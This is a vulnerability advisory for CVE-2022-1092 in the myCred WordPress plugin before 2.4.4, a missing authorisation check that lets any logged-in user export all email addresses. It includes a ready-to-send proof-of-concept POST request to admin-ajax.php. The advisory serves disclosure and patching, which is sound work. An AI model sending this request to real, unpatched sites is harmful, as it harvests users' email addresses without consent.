myCred < 2.4.4 – Subscriber+ Import/Export to Email Address Disclosure | CVE 2022-1092 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks in its mycred-tools-import-export AJAX action, allowing any authenticated user to call and and retrieve the list of email address present in the blog

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 130
Cookie: [any authenticated user]

action=mycred-tools-import-export&request_tab=points&request=export&template=raw&user_field=email&types=%5B%22mycred_default%22%5D

Affects Plugins

Fixed in 2.4.4

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

David Hamann

Submitter

David Hamann

Submitter website

https://davidhamann.de

Submitter twitter

Verified

Yes

WPVDB ID

95759d5c-8802-4493-b7e5-7f2bc546af61

Timeline

Publicly Published

2022-03-29 (about 3 years ago)

Added

2022-03-29 (about 3 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2024-04-22

Title

CookieHub < 1.1.1 - Missing Authorization

Published

2025-01-24

Title

Thim Elementor Kit < 1.2.9 - Missing Authorization

Published

2023-12-27

Title

WP MLM Unilevel <= 4.0 - Unauthenticated Privilege Escalation

Published

2025-02-23

Title

Market Exporter < 2.0.22 - Missing Authorization

Published

2025-04-04

Title

Variable Inspector <= 2.6.3 - Missing Authorization